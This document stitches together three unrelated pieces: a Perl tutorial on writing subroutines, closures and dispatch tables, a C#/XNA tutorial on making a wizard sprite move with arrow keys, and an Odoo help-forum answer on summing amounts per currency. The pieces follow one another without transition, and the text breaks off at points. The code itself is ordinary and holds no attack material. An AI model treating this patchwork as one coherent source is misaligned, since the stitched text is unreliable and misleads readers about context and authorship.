Insert into the report something like the following and get the profit.
<t t-
<p><t t-<t t-</p>
</t>
Season with any decoration.
Well.. the second way is to create a separate table with sums for each currency like the class AccountInvoiceLine(models.Model). The code is in brief. I did not test the whole idea.
class ExpenseTicket(models.Model):
expense_ticket_currency_ids = fields.One2many('expense.ticket.currency', 'expenseticket_id')
class ExpenseTicketCurrency(models.Model):
_name = "expense.ticket.currency"
expenseticket_id = fields.Many2one('expense.ticket', string='', ondelete='cascade', index=True)
currency_id = fields.Many2one('res.currency',string='Currency')
amount_currency=fields.Monetary(string='Amount', currency_field='currency_id')
In a view we can use 'tree'
<field name="expense_ticket_currency_ids">
<tree string="">
<field name="currency_id"/>
<field name="amount_currency"/>
</tree>
</field>
The last part is to write functions to store data into ExpenseTicketCurrency.
Question again
There are some products(services type) on the sales order line of the same sales order, which are in different currencies.
How to sum them group by different currencies and show on sale order form?
E.g:
Ocean Freight USD 10.00
Truck charge USD 5.00
Documents Fee EUR 50.00
Discharge Fee CNY 100
Total : USD xx.xx
EUR xx.xx
CNY xx.xx
Any good idea?
The answer is below. I do not know your format of invoice lines but referring to invoice lines of the standard accounting module the code should be changed and added to '_compute_amount(self)' of the AccountInvoice.
amount_untaxed_sums=dict([(l.currency_id.name,0) for l in self.invoice_line_ids])
for line in self.invoice_line_ids:
amount_untaxed_sums[line.currency_id.name]+=line.price_subtotal
I did not test the code in Odoo but it should work.
About This Community
Odoo Training Center
Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
Currency comes from price list. you can only select one currency for a price list..then how you are going to set this three currencies in same SO?
in which currency you want the sum??
Tks for your reply.There is only one currency on the same sales order that does not meet my requirements.I need multi currencies on same sales order.
So you may have customized SO line to set different currency in each line..
You have to enable multi currency and one of them should be Base..
you haven't said which one is your base currency? ie in which currency you wan the sum)
My base currency is CNY, Now I can sum the base currency. In addition I need to sum these foreign currency lines
if you have currency field in SO line...then you can calculate total easily
for line in self.order_line:
if line.currency_id.name == USD:
usd_total += line.subtotal
if line.currency_id.name == EUR:
eur_total += line.subtotal
if line.currency_id.name == CYN:
cyn_total += line.subtotal
like this
super!I'll try it! Thanks
Make it as answer if you succeed
okay. | https://www.odoo.com/forum/help-1/question/how-to-sum-of-them-separate-from-currencies-110285 | CC-MAIN-2018-26 | refinedweb | 732 | 62.54 |
In the past, I have written code similar to that in the related Tip, but for any who like Regular Expressions, here is a Regular Expression that will split a string into segments with a maximum length, but which has the ability to split on "breaks" so words aren't broken up: (?s).{1,314}(?=(\b|$))
(?s).{1,314}(?=(\b|$))
private static System.Collections.Generic.IEnumerable<string>
Segment
(
string text
,
int maxlen
)
{
string regex = System.String.Format ( @"(?s).{{1,{0}}}(?=(\b|$))" , maxlen ) ;
System.Text.RegularExpressions.Regex reg = new System.Text.RegularExpressions.Regex ( regex ) ;
System.Text.RegularExpressions.MatchCollection m = reg.Matches ( text ) ;
for ( int i = 0 ; i < m.Count ; i++ )
{
yield return ( m [ i ].Value ) ;
}
yield break ;
}
int MAX_CHARS_TO_SHOW = 314;
string msg = .";
foreach ( string s in Segment ( msg , MAX_CHARS_TO_SHOW ) )
{
System.Console.WriteLine ( s ) ;
}
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
B. Clay Shannon wrote:But will you?
B. Clay Shannon wrote:that "Segment" stuff
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | http://www.codeproject.com/Tips/786786/How-to-Split-Long-Strings-into-Manageable-Portio | CC-MAIN-2016-36 | refinedweb | 195 | 51.65 |
Load balancing
This is a extension of what is described in - it extends part 2 with a second option, where the choosen LTSP server is not random but the least utilized one. Un
Option 2
The second option is more advanced, it gives you a server list generated by querying ldminfod for the server rating. By querying ldminfod, you can get the current rating state of the server. This rating goes from 0 to 100, higher is better. For this to work, you have to use the ubuntu version of ldminfod. (remark from h01ger: which version of ubuntu? it looks like Debian lenny is enough too?) The Skolelinux version doesn't have the server rating function.
First you should make a backup of the original ldminfod-file, which is in /usr/sbin/. Then, put the following script in a new ldminfod-file. Make sure the new file has the same permissions as the old one.
import sys import os import locale from subprocess import * def get_memory_usage(): memusg = {} # Get memory usage information, according to /proc/meminfo f = open('/proc/meminfo', 'r') swap_free = 0 mem_physical_free = 0 mem_buffers = 0 mem_cached = 0 for line in f.readlines(): tokens = line.split() label = tokens[0] size = tokens[1] try: size = int(size) except: # The line is an header, skip it. continue # We approximate kb to bytes size = size * 1024 if label == 'MemTotal:': memusg['ram_total'] = size elif label == 'MemFree:': mem_physical_free = size elif label == 'Buffers:': mem_buffers = size elif label == 'Cached:': mem_cached = size elif label == 'SwapTotal:': memusg['swap_total'] = size elif label == 'SwapFree:': swap_free = size f.close() memusg['ram_used'] = memusg['ram_total'] - mem_physical_free - mem_buffers - mem_cached memusg['swap_used'] = memusg['swap_total'] - swap_free return memusg def get_load_average(): # Gets the current system load, according to /proc/loadavg loadavg = {} load_file = open('/proc/loadavg') load_infos = load_file.read().split() loadavg['one_min_avg'] = load_infos[0] loadavg['five_min_avg'] = load_infos[1] loadavg['fifteen_min_avg'] = load_infos[2] # scheduling_info = load_infos[3] # not used # last_pid = load_infos[4] load_file.close() return loadavg def compute_server_rating(): """Compute the server rating from it's state The rating is computed by using load average and the memory used. The returned value is betweed 0 and 100, higher is better """ max_acceptable_load_avg = 8.0 mem = get_memory_usage() load = get_load_average() rating = 100 - int( 50 * ( float(load['fifteen_min_avg']) / max_acceptable_load_avg ) + 50 * ( float(mem['ram_used']) / float(mem['ram_total']) ) ) if rating < 0: rating = 0 return rating def get_sessions (dir): """Get a list of available sessions. Returns a list of sessions gathered from .desktop files """ sessions = [] if os.path.isdir(dir): for f in os.listdir(dir): if f.endswith('.desktop') and os.path.isfile(os.path.join(dir, f)): x={} for line in file(os.path.join(dir, f), 'r').readlines(): if 'Exec=' in line: variable, value = line.split('=') x[variable]=value if 'TryExec' in x: sessions.append(x['TryExec'].rstrip()) elif 'Exec' in x: sessions.append(x['Exec'].rstrip()) return sessions if __name__ == "__main__": # Get the server's default locale # We want it to appear first in the list try: lines = Popen(['locale'], stdout=PIPE).communicate()[0] except OSError: print "ERROR: failed to run locale" sys.exit(0) for line in lines.split(): if line.startswith('LANG='): defaultlocale = line.split('=')[1].strip('"') defaultlocale = defaultlocale.replace('UTF8', 'UTF-8') print "language:" + defaultlocale # Get list of valid locales from locale -a try: lines = Popen(['locale', '-a'], stdout=PIPE).communicate()[0] except OSError: print "ERROR" sys.exit(0) langs = lines.split(None) langs.sort() for lang in langs: lang = lang.rstrip() if lang.endswith('.utf8'): # locale returns .utf8 when we want .UTF-8 lang = lang.replace('.utf8','.UTF-8') else: # if locale did not end with .utf8, do not add to list continue if lang != 'POSIX' and lang != 'C' and lang != defaultlocale: print "language:" + lang try: lines = get_sessions('/usr/share/xsessions/') except OSError: print "ERROR" sys.exit(0) for line in lines: print "session:" + line # Get the rating of this server rate = 0 try: rate = compute_server_rating() except: print "ERROR" sys.exit(0) print "rating:" + str(compute_server_rating())
Now you have to edit "/opt/ltsp/i386/etc/lts.conf" and add this:
MY_SERVERS = .
LIST="" # Load query on all servers for i in $MY_SERVERS; do LOAD=`nc $i 9571|grep rating|cut -d: -f2` if test $LOAD; then # add to the list LIST="$LIST$LOAD $i\n" fi done # Now LIST contains the list of servers sorted by load LIST=`echo -e $LIST | sort -nr` # Check if the 1st items have the same load. If so, randomly choose one. OLDIFS=$IFS IFS=" " BESTLIST=( ) I=0 for LINE in $LIST ;do LOAD=`echo $LINE|cut -f 1 -d " "` if [ "$OLDLOAD" -a "$LOAD" != "$OLDLOAD" ] ;then break fi BESTLIST[$I]="$LINE" OLDLOAD=$LOAD I=$((I+1)) done RAND=$(( $RANDOM % $I )) # print the choosen host echo ${BESTLIST[$RAND]} | cut -f 2 -d " " exit 0 | https://wiki.debian.org/DebianEdu/HowTo/LtspLoadBalance | CC-MAIN-2018-39 | refinedweb | 776 | 59.8 |
Documentation ¶
Overview ¶
Package framework contains a high-level framework for implementing Sentinel imports with Go.
The direct sdk.Import interface is a low-level interface that is tediuos, clunky, and difficult to implement correctly. The interface is this way to assist in the performance of imports while executing Sentinel policies. This package provides a high-level API that eases import implementation while still supporting the performance-sensitive interface underneath.
Imports are generally activated in this framework by serving the plugin with the root namespace embedded in Import:
package main import ( "github.com/hashicorp/sentinel-sdk" "github.com/hashicorp/sentinel-sdk/rpc" ) func main() { rpc.Serve(&rpc.ServeOpts{ ImportFunc: func() sdk.Import { return &framework.Import{Root: &root{}} }, }) }
The plugin framework is based around the concept of namespaces. Root is the entrypoint namespace and must be implemented as a minimum. From there, nested access may be delegated to other Namespace implementations.
Namespaces outside of the root must at least implement the Namespace interface. All namespaces, including the root, may implement the optional Call or Map interfaces, to support function calls or selective memoization calls, respectively.
Root namespaces are generally global, that is, for the lifetime of the execution of Sentinel, one single import Root namespace state will be shared by all policies that need to be executed. Take care when storing state in the Root namespace. If you require state in the Root namespace that must be unique across policy executions, implement the NamespaceCreator interface.
The Root namespace (or the NamespaceCreator interface, which embeds Root) may optionally implement the New interface, which allows for the construction of namespaces via the handling of arbitrary object data. New is ignored for namespaces past the root.
Non-primitive import return data is normally memoized, including for namespaces. This prevents expensive calls over the plugin RPC. Memoization can be controlled by a couple of methods:
* Implementing the Map interface allows for the explicit return of a map of values, sidestepping struct memoization. Normally, this is combined with the MapFromKeys function which will call Get for each defined key and add the return values to the map. Note that multi-key import calls always bypass memoization - so if foo.bar is a namespace that implements Map but foo.bar.baz is looked up in a single expression, it does not matter if baz is excluded from Map.
* Struct memoization is implicit otherwise. Only exported fields are acted on - fields are lower and snake cased where applicable. To control this behavior, you can use the "sentinel" struct tag. sentinel:"NAME" will alter the field to have the name indicated by NAME, while an empty string will exclude the field.
Additionally, there are a couple of nuances that the plugin author should be cognizant of:
* nil values within slices, maps, and structs are converted to nulls in the return object.
* Returning a nil from a Get call is undefined, not null.
The author can alter this behavior explicitly by assigning or returning the sdk.Null and sdk.Undefined values.
Index ¶
Constants ¶
This section is empty.
Variables ¶
This section is empty.
Functions ¶
Types ¶
type Call ¶
type Call interface { Namespace // Func returns a function to call for the given string. The function // must take some number of arguments and return (interface{}, error). // The argument types may be Go types and the framework will handle // conversion and validation automatically. // // The returned function may also return only interface{}. In this case, // it is assumed an error scenario is impossible. Any other number of // return values will result in an error. // // This should return nil if the key doesn't support being called. Func(string) interface{} }
Call is a Namespace that supports call expressions. For example, "time.now()" would invoke the Func function for "now".
type Import ¶
type Import struct { // Root is the implementation of the import that the user of the // framework should implement. It represents the minimum necessary // implementation for an import. See the docs for Root for more details. Root Root // contains filtered or unexported fields }
Import implements sdk.Import. Configure and return this structure to simplify implementation of sdk.Import.
func (*Import) Configure ¶
plugin.Import impl.
type Map ¶
type Map interface { Namespace // Map returns the entire map for this value. The return value // must only contain values convertable by lang/object.ToObject. It // cannot contain functions or other framework interface implementations. Map() (map[string]interface{}, error) }
Map is a Namespace that supports returning the entire map of data. For example, if "time.pst" implemented this, then the writer of a policy may request "time.pst" and get the entire value back as a map.
type Namespace ¶
type Namespace interface { // Get requests the value for a specific key. This must return a value // convertable by lang/object.ToObject or another Interface value. // // If the value doesn't exist, nil should be returned. This will turn // into "undefined" eventually in the Sentinel policy. If you want to // return an explicit "null" value, please return object.Null directly. // // If an Interface implementation is returned, this is treated like // a namespace. For example, "time.pst" may return an Interface since // the value itself expects further keys such as ".hour". Get(string) (interface{}, error) }
Namespace represents a namespace of attributes that can be requested by key. For example in "time.pst.hour, time.pst.minute", "time.pst" would be a namespace.
Namespaces are either represented or returned by the Root implementation. Root is the top-level implementation for an import. See Import and Root for more details.
A Namespace on its own doesn't allow accessing the full mapping of keys and values. Map may be optionally implemented to support this. Following the example in the first paragraph of this documentation, "time.pst" itself wouldn't be allowed for a Namespace on its own. If the implementation also implements Map, then "time.pst" would return a complete mapping.
type NamespaceCreator ¶
type NamespaceCreator interface { Root // Namespace is called to return the root namespace for accessing keys. // // This will be called once for each policy execution. If data and access // is shared by all policy executions (such as static data), then you // can return a singleton value. // // If each policy execution should maintain its own state, then this // should return a new value. Namespace() Namespace }
NamespaceCreator is an interface only used in conjunction with the Root interface. It allows the Root implementation to create a unique Namespace implementation for each policy execution.
This is useful for imports that maintain state per policy execution. For example for the "time" package, it may be useful for the state to be the current time so that all access returns a singular view of time for a policy execution.
If your import doesn't require per-execution state, Root should implement Namespace directly instead.
type New ¶ added in v0.3.0
type New interface { Namespace // New is called to construct new namespaces based on arbitrary // receiver data. // // The format of the object and the kinds of namespaces returned by // the constructor are up to the import author. // // Namespaces returned by this function must implement // framework.Map, or else errors will be returned on // post-processing of the receiver. // // New should return an error if there are issues instantiating the // namespace. This includes if the namespace cannot be determined // from the receiver data. Returning nil from this function will // return undefined to the caller. New(map[string]interface{}) (Namespace, error) }
New is an interface indicating that the namespace supports object construction via the handling of arbitrary object data. New is only supported on root namespaces, so either created through Root or NamespaceCreator.
The format of the object and the kinds of namespaces returned by the constructor are up to the import author.
type Root ¶
type Root interface { // Configure is called to configure this import with the operator // supplied configuration for this import. Configure(map[string]interface{}) error }
Root is the import root. For any import, there is only a single root. For example, if you're implementing an import named "time", then the "time" identifier itself represents the import root.
The root of an import is configurable and is able to return the actual interfaces uses for value retrieval. The root itself can never contain a value, be callable, return all mappings, etc.
A single root implementation and instance may be shared by many policy executions if their configurations match. | https://pkg.go.dev/github.com/hashicorp/sentinel-sdk@v0.3.12/framework | CC-MAIN-2022-21 | refinedweb | 1,388 | 50.53 |
Forum:Featured News Story?
From Uncyclopedia, the content-free encyclopedia
Update: I have removed the old recent news template from the front page. Ithas been replaced with a template listing UnNews stories. From now on please put links to new UnNews stories here instead of in recent articles. You can find the link to the template on the UnNews "Write an Article" help sheet. If you know of another place to put a link to it on the UnNews main page, please do so.
Still unresolved is the issue of featuring UnNews. I would be willing to run a VFUnNews page if there is a groundswell for selecting the top stories that way. ---
Rev. Isra (talk) 23:06, 7 April 2006 (UTC)
WE NEED TO CHANGE "IN THE NEWS" AS SOON AS POSSIBLE. It sucks. Seriously. Let's change it to a dynamic UnNews list with blurbs controlled by admins. Seriously. The stuff on there makes me want to puke it's so lame. --
» Sir Savethemooses Grand Commanding Officer ... holla atcha boy» 20:33, 7 April 2006 (UTC)
I was thinking that UnNews is starting to reach the point of having some fantastically good articles that are well worth featuring but that it might not fit the motif to feature them as standard articles. They really are a different sort of thing than most articles. Anyone else have any views on the matter? --Sir gwax (talk)
15:22, 17 March 2006 (UTC)
- Definately, just looking at VFH there are at least a couple nommed. However, alot of these against votes were due to size issues, which is understandable for a "news" article. I think it's about time we make an UnNews VFH and feature them...:41, 17 March 2006 (UTC)
- maybe we could vote in unnews for which storys are featured in there instead of anyone filling it with their crap ;)--Da, Y?YY?YYY?:-:CUN3 NotM BLK |_LG8+::: 23:35, 18 March 2006 (UTC)
- Excellent idea, yyy. I am for it. --
» Sir Savethemooses Grand Commanding Officer ... holla atcha boy» 23:39, 18 March 2006 (UTC)
- Makes sense, since UnNews articles aren't regular articles. --OsirisX 05:38, 19 March 2006 (UTC)
- Having a voted-in featured news story on the front page of Uncyclopedia would be a damn fine thing, as UnNews is of surprisingly high quality. Certainly higher than the Uncyclopedia new article feed. As for what to do with the UnNews front page, I suppose that could be a spinoff from the main front page feature - David Gerard 16:27, 19 March 2006 (UTC)
- Is it just me, or has there been a recent surge in UnNews quantity and quality? --
» Sir Savethemooses Grand Commanding Officer ... holla atcha boy» 16:54, 19 March 2006 (UTC)
- I think that's why it's about time we have an UnNews featured:02, 19 March 2006 (UTC)
Personally I like it as it is, it is updated frequently, and there is a fresh supply of good articles. We need not feature one to showcase the good work, nearly all of them are:00, 20 March 2006 (UTC)
- I suspect it's because it takes actualy effor to post an UnNews story....--The Right Honourable Maj Sir Elvis UmP KUN FIC MDA VFH Bur. CM and bars UGM F@H (Petition) 16:17, 20 March 2006 (UTC)
- I suspect it's also because the standards are different. The Lockheed U2 story was in article space and I spotted it as an NRV. I realised it was really UnNews, and put it there. Just changing the namespace, hence the expectations, made it a pretty good story - David Gerard 18:43, 20 March 2006 (UTC)
I think there's a conflict here. I agree with Rangeley that the majority of UnNews articles these days are good, and an impressive proportion are great. I feel like the main purpose of having a featured news story would be to get those articles off VFH - which might be good in that it would make the Main Page featured articles more encyclopedic, but it also means that great UnNews articles would probably get less attention, which I think is unfair. We'd also need someone to manage an UnNews VFH. --—rc (t) 19:39, 20 March 2006 (UTC)
I FOUND THE SOLUTION: What if we just take away all those short and, (more frequently than not), unfunny news titles from the "In the news" section of the frontpage, and we replace them by longer and funny featured news stories. I know it will look less like WP, but it will be much funnier, (and that's the main thing I think) while still resembeling it.--Rataube 23:27, 20 March 2006 (UTC)
- I actually think that would make it more like WP because the headlines will be actual newsy. For. --
» Sir Savethemooses Grand Commanding Officer ... holla atcha boy» 23:42, 20 March 2006 (UTC)
- Kill Template:Recentnews and promote UnNews at the same time? Oh Yes Please. Just use a dynamic list of recent UnNews stories and cap it at 10. Or maybe a 5/5 (7/3?) split with UnNews Audio? ~ T. (talk) 05:02, 21 March 2006 (UTC)
- Ooh, that sounds sexy. Possibly a page like UnNews:Story title here/blurb for a one line wikicode that can get included via a template. --Splaka 05:08, 21 March 2006 (UTC)
- For, one suggestion though, featured news stories should have an audio counterpart. --OsirisX 06:11, 21 March 2006 (UTC)
- Ooh, me likey. However, there is still the question of what to do with great UnNewses; perhaps the In The News could be filled with a randomly generated list of articles that have been voted superior? --Hobelhouse 00:40, 6 April 2006 (UTC) | http://uncyclopedia.wikia.com/wiki/Forum:Featured_News_Story%3F | CC-MAIN-2016-18 | refinedweb | 957 | 70.63 |
This week Logstash 1.2.0 has been released with exciting new features. Logstash is (from the Website): "[...] a tool for managing events and logs. You can use it to collect logs, parse them, and store them for later use (like, for searching). [...]"
The full Changelog can be found on [Github][1], here is a short list with some more details:
- New JSON schema
The annoying @ has been removed from all fields, except @timestamp and @version (this field includes the JSON schema version for future schema changes). This change makes it look much nicer on webfrontends like Kibana. Also the "field." prefix has been removed, all fields are now in the "global" namespace. More information on the schema change can be found in the Jira bugtracker: [LOGSTASH-675][2]
- Kibana 3 included
As a replacement for the old integrated webinterface, Kibana 3 is now part of the Logstash distribution and can be started with the "web" parameter
- Conditionals (if, then, else, else if) in the configuration
Versions prior to 1.2.0 used the "type" and "tags" parameter of filter and output plugins to select which log to process with a particular filter or output. This is now obsolete. The new way is to use conditionals inside the configuration file (more on that later!)
- Field references
Fields can now be referenced with [ and ] around it. F.e. [field1] or [field1][subfield2]
- Elasticsearch 0.90.3
The integrated Elasticsearch client and server have been upgraded to 0.90.3. This brings much more features and performance and makes Logstash compatible again to the latest and greatest Elasticsearch version
- New plugin type: codec
This plugin type is used to decode the incoming data (input plugins) or decode outgoing data (output plugins)
- Plugin status is now plugin milestone
More on that can be found on the official documentation website "[Plugin Milestones][3]"
These are the most important changes. Many more changes were made to inputs, filters and outputs (see [Changelog][1]).
Upgrade hints
Logstash wants to be backwards compatible. You can just replace the jar file with the new version, restart Logstash with the same configuration file as used for the older version and everything should be running again. If not, then it's a bug which should be reported. Note: Configuration options which were marked as deprecated on older version are most likely not available anymore in newer versions.
To make use of all the shiny new features, the configuration needs to be updated. Here are some hints:
Using conditionals
Filters and outputs used the "type" and "tags" parameter to select which log needs to be processed. This can now be done with conditionals. See the [official documentation][4] for more details. And here are some examples:
Example 1: Filter on type (old way)
input { stdin { type => "stdinput" } } output { stdout { debug => true type => "stdinput" } }
This will output: "Deprecated config item "type" set in LogStash::Outputs::Stdout"
Example 1: Filter on type (new way)
input { stdin { type => "stdinput" } } output { if [type] == "stdinput" { stdout { debug => true } } }
Example 2: Filter on tags (old way)
input { stdin { type => "stdinput" tags => [ "tag1", "tag2" ] } } output { stdout { debug => true tags => "tag1" } }
This will output: "Deprecated config item "tags" set in LogStash::Outputs::Stdout"
Example 2: Filter on tags (new way)
input { stdin { type => "stdinput" tags => [ "tag1", "tag2" ] } } output { if "tag1" in [tags] { stdout { debug => true } } }
As you can see, with conditionals it's possible to do the same things as before, but much flexibler.
One thing that's missing is the condition "not in". It's not possible to use f.e. "if "tag1" !in [tags]". The workaround I found is to use "else":
if "_grokparsefailure" in [tags] { } else { # YOUR CODE }
Schema update: Field names and references
All fields (except @version and @timestamp) lost their @. So all filters which references fields must be updated to reflect this change (simply remove the @ before). Also take care of the removal of the "fields." namespace and the new field referencing ('[foo][bar]' instead of 'foo.bar').
This also affects the Elasticsearch index (keyword mappings) and Kibana, they also need some update love.
Reindexing the old data to reflect this change can be done with the Elasticsearch input using the codec "oldlogstashjson".
Puppet module
If you are a Puppet user, I'm sure you want to use the official Puppet module which can be found on [Github][5]. At this time it's not yet ready for the new features of 1.2.0. Therefore I just use file delivery to deliver the configuration files.
The Logstash Book
It has been updated to reflect version 1.2.0. I can really suggest this book, it covers all important things one must know about Logstash and it's ecosystem. See the official [Website][6].
Update 1.2.1
Shortly after 1.2.0 a bugfix release 1.2.1 has been released ([Changelog][7]). It fixes some bugs and adds the "not in" condition.
So it's now possible to exclude logs with the tag "_grokparsefailure" as follows:
if "_grokparsefailure" not in [tags] { # YOUR CODE }
- 1:
- 2:
- 3:
- 4:
- 5:
- 6:
- 7: | https://tobru.ch/logstash-1-2-0-upgrade-notes-included/ | CC-MAIN-2020-34 | refinedweb | 848 | 62.17 |
It is a simple example of three dots(…) in reactjs and JSX.
Three dots in react specify to pass object properties from react components hierarchy. It also updates nested json objects in react application.
three dots(…) is also called
spread attribute or
spread syntax in javascript.
It was introduced as part of ES6. You can check my previous tutorial on `Spread operator.
What does three dots do?
It allows expansion of the enumerable properties of an object, which means array expressions or string or object properties are enumerable properties.
Let’s see a simple example of how it expands the enumerable properties.
var data = ['3', '4','5']; var numbers = ['1', ...data, '6', '7']; // ["1", "3", "4", "5", "6","7"]
In the above example, data contains multiple enumerable properties. To add those numbers to another array in between, spread operator placed and results into copying multiple properties to result.
It helps to pass at least zero arguments i.e. dynamic properties.
How do react components use three dots?
var employee= { name: 'Franc', id: 1, salary:5000 }
How this data transferred as props from parent to child component.
How about if there are a larger set of properties to pass an object to react component.
It looks not a clean way of passing like this.
Similarly, rewriting above with
spread operator syntax.
<Employee {...employee}>
It is a clean way of passing data from one component to another component.
three dots in react hooks example
This spread operator is used in react hooks to update state objects.
React state object is initialized with default object properties using useState object useState object returns initial state and function which updates state.
While doing update the state, spread operator copy the original data with new values. It will only updates the properties which is not changed.
const [employee, setEmployee] = useState({ id: '', name: '', salary: '' }); setEmployees([ ...employees, { name: "John", id:"10", salary:"5000" } ]);
Here is a complete example:
import React, { useState } from 'react'; function HookSpreadArray(props) { const [employe, setEmploye] = useState([]); const [name, setName] = useState(""); const saveEmploye = event => { event.preventDefault(); setEmploye([ ...employe, { name: name } ]); setName(""); }; return ( <div> <> <form onSubmit={saveEmploye}> <label>Name <input name="name" type="text" value={name} onChange={e => setName(e.target.value)} /> </label> <button name="Save" value="Save">Save</button> </form> <ul> {employe.map(emp => ( <li key={emp.empid}>{emp.name}</li> ))} </ul> </> </div> ); } export default HookSpreadArray;
spread operator in react state
Spread operator used in changing react state properties Let’s declare the state in the constructor as follows.
this.state = { name: "Fran" }
The state can be updated using the setState method with an object parameter.
The first way, with simple syntax
this.setState({name: "kiran"})
Second, The same can be achieved with spread operator or three dots syntax
this.setState({ ...this.state, name: "kiran" }) )
As you see, merging the existing state with a new object with this. passing … to this. the state will do a shallow merge into a new state.
Both approaches are helpful and do the same, but the first syntax is difficult when you have a nested object in the state tree.
For example, nested object is initialized in state object
state = { id:1, name:"John", dept:{ name:"Sales" } }
How do you update the nested json object in react state?
ie you want to update the name in dept. to new value i.e dept:{name:“Support”}
using three dots in state object, you can update easily
this.setState({ dept: { ...this.state.dept, name: 'support' }}) | https://www.cloudhadoop.com/reactjs-threedots-spreadsyntax/ | CC-MAIN-2022-21 | refinedweb | 574 | 58.38 |
- NAME
- SYNOPSIS
- ABOUT THIS DOCUMENT
- WHAT TO READ WHEN IN A HURRY
- ABOUT LIBEV
- ERROR HANDLING
- GLOBAL FUNCTIONS
- FUNCTIONS CONTROLLING EVENT LOOPS
- ANATOMY OF A WATCHER
- WATCHER TYPES
- ev and ev_check - customise your event loop!
- ev_embed - when one backend isn't enough...
- ev_fork - the audacity to resume the event loop after a fork
- ev_cleanup - even the best things end
- ev_async - how to wake up an event loop
- OTHER FUNCTIONS
- COMMON OR USEFUL IDIOMS (OR BOTH)
- LIBEVENT EMULATION
- C++ SUPPORT
- OTHER LANGUAGE BINDINGS
- MACRO MAGIC
- EMBEDDING
- INTERACTION WITH OTHER PROGRAMS, LIBRARIES OR THE ENVIRONMENT
- PORTABILITY NOTES
- GNU/LINUX 32 BIT LIMITATIONS
- OS/X AND DARWIN BUGS
- SOLARIS PROBLEMS AND WORKAROUNDS
- AIX POLL BUG
- WIN32 PLATFORM LIMITATIONS AND WORKAROUNDS
- PORTABILITY REQUIREMENTS
- ALGORITHMIC COMPLEXITIES
- PORTING FROM LIBEV 3.X TO 4.X
- GLOSSARY
- AUTHOR
NAME
libev - a high performance full-featured event loop written in C
SYNOPSIS
#include <ev.h>; }
ABOUT THIS DOCUMENT
This document documents the libev software package..
WHAT TO READ WHEN IN A HURRY"..
FEATURES
Libev supports).
CONVENTIONS
Libev is very configurable. In this manual the default (and most common).
TIME REPRESENTATION.
GLOBAL FUNCTIONS
These functions can be called anytime, even before initialising the library in any way.
- ev_tstamp ev_time ()
Returns the current time as libev would use it. Please note that the
ev_nowfunction is usually faster and also often returns the timestamp you actually want to know. Also interesting is the combination of
ev_now_updateand
ev_version_minor. If you want, you can compare against the global symbols
EV_VERSION_MAJOR));
- unsigned int ev_supported_backends ()
Return the set of all backends (i.e. their corresponding
EV_BACKEND_*value) compiled into this binary of libev (independent of their availability on the system you are running on). See
ev_default_loopfor));
- unsigned int ev_recommended_backends ()
Return
ev_embeddable_backends () & ev_supported_backends (), likewise for recommended ones.
See the description of
ev_embedwatchers for more info.
- ev_set_allocator (void *(*cb)(void *ptr, long size) throw ())
Sets the allocation function to use (the prototype is similar - the semantics are identical to the
reallocCsemantics, libev will use a wrapper around the system
reallocand
freefunctions by default. (example requires a standards-compliant
realloc).
static void * persistent_realloc (void *ptr, size_t size) { for (;;) { void *newptr = realloc (ptr, size); if (newptr) return newptr; sleep (60); } } ... ev_set_allocator (persistent_realloc);
-
EVFLAG_NOSIGMASKwhen creating any loops), and in one thread, use
sigwaitor any other mechanism to wait for signals, then "deliver" them to libev by calling
ev_feed_signal.
FUNCTIONS CONTROLLING EVENT LOOPSparameteror otherwise qualifies as "the main program".
If you don't know what event loop to use, use the one returned from this function (or via the
EV_DEFAULTmacro).watchers, and to do this, it always registers a handler for
SIGCHLD. If this is a problem for your application you can either create a dynamic loop with
ev_loop_newwhich doesn't do that, or you can simply overwrite the
SIGCHLDsignal handler after calling or'ed).
EVFLAG_FORKCHECK
Instead of calling
ev_loop_forkmanually noticeable (on my GNU/Linux system for example,
getpidis actually a simple 5-insn sequence without a system call and thus very fast, but my GNU/Linux system also has
pthread_atforkwhich is even faster).
The big advantage of this flag is that you can forget about fork (and forget about forgetting to tell libev about forking) when you use this flag.
This flag setting cannot be overridden or specified in the
LIBEV_FLAGSenvironment variable.
EVFLAG_NOINOTIFY
When this flag is specified, then libev will not attempt to use the inotify API for its
ev_statwatchers. Apart from debugging and testing, this flag can be useful to conserve inotify file descriptors, as otherwise each loop using
ev_statwatchers consumes one inotify handle.
EVFLAG_SIGNALFD
When this flag is specified, then
sigprocmask, whose behaviour is officially unspecified.
This flag's behaviour will become the default in future versions of libev.
accept ()in a loop to accept as many connections as possible during one iteration. You might also want to have a look at
ev_set_io_collect_interval ()to increase the amount of readiness notifications you get per iteration.
This backend maps
EV_READto the
readfdsset and
EV_WRITEto the
writefdsset (and to work around Microsoft Windows bugs, also onto the
exceptfdsset on that platform).
EVBACKEND_SELECT, above, for performance tips.
This backend maps
EV_READto
POLLIN | POLLERR | POLLHUP, and
EV_WRITEto
POLLOUT | POLLERR | POLLH file descriptor could point to a different file description now), so its best to avoid that. Also,,
EVBACKEND_SELECTcan be as fast or faster than epoll for maybe up to a hundred file descriptors, depending on the usage. So sad.
While nominally embeddable in other event loops, this feature is broken in all kernel versions tested so far.
This backend maps
EV_READand
EV_WRITEin the same way as
EVBACKEND_POLL.
EVBACKEND_KQUEUE(value 8, most BSD clones)
Kqueue deserves special mention, as at the time of this writing, (and eventually will) be fixed without API changes to existing programs. For this reason it's not being "auto-detected" unless you explicitly specify it in the flags (i.e. using
ev_embedwat
EVBACKEND_EPOLL, it still adds up to two event changes per incident. Support for
fork ()is very bad (you might have to leak fd's.
EVBACKEND_SELECTor
EVBACKEND_POLL(but
pollis of course also broken on OS X)) and, did I mention it, using it only for sockets.
This backend maps
EV_READinto an
EVFILT_READkevent with
NOTE_EOF, and
EV_WRITEinto an
EVFILT_WRITEkevent with
NOTE_EOF.
EVBACKEND_DEVPOLL(value 16, Solaris 8)
This is not implemented yet (and might never be, unless you send me an implementation). According to reports,
/dev/pollonly supports sockets and is not embeddable, which would limit the usefulness of this backend immensely."
EVBACKEND_SELECTor
EVBACKEND_POLLbackend might perform better.
On the positive side, this backend actually performed fully to specification in all tests and is fully embeddable, which is a rare feat among the OS-specific backends (I vastly prefer correctness over speed hacks).
On the negative side, the interface is
EV_READand
EV_WRITEvalue, in case you want to mask out any backends from a flags value (e.g. when modifying the
LIBEV_FLAGSenvironment variable).
If one or more of the backend flags are or'ed into the flags value, then only these backends will be tried (in the reverse order as listed here). If none are specified, all backends);
- ev_loop_destroy (loop)
